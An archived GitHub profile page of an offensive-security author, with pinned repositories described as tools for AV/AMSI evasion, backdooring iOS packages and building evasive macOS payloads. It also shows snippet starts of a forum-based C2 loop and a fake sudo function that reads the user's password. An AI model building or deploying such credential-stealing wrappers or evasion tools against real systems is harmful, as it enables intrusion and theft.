The Wayback Machine - https://web.archive.org/web/20210725065921/https://github.com/tokyoneon
Skip to content
Avatar
💻
tokyoneon@kali ~#
💻
tokyoneon@kali ~#

Achievements

Achievements

Block or Report

Block or report tokyoneon

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse

Pinned

  1. Chimera is a (shiny and very hack-ish) PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.

    PowerShell 637 149

  2. Arcane is a simple script designed to backdoor iOS packages (iphone-arm) and create the necessary resources for APT repositories.

    Shell 80 23

  3. 1
    # write-up: https://www.varonis.com/blog/author/tokyoneon/
    2
    
                  
    3
    # an if statement to prevent the attack from executing without administrator privileges
    4
    if (whoami /groups | findstr /i "S-1-16-12288")
    5
    {
  4. Armor is a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus scanners.

    Shell 234 49

  5. 1
    #!/bin/bash
    2
    
                  
    3
    # https://null-byte.com/turn-forums-into-c-c-servers-0196708/
    4
    
                  
    5
    while true; do
  6. 1
    function sudo () 
    2
    { 
    3
        # https://null-byte.com/privesc-0194190/
    4
        realsudo="$(which sudo)";
    5
        read -s -p "[sudo] password for $USER: " inputPasswd;

882 contributions in the last year

Aug Sep Oct Nov Dec Jan Feb Mar Apr May Jun Jul Mon Wed Fri

Contribution activity

July 2021

12 contributions in private repositories Jul 11 – Jul 24

Seeing something unexpected? Take a look at the GitHub profile guide.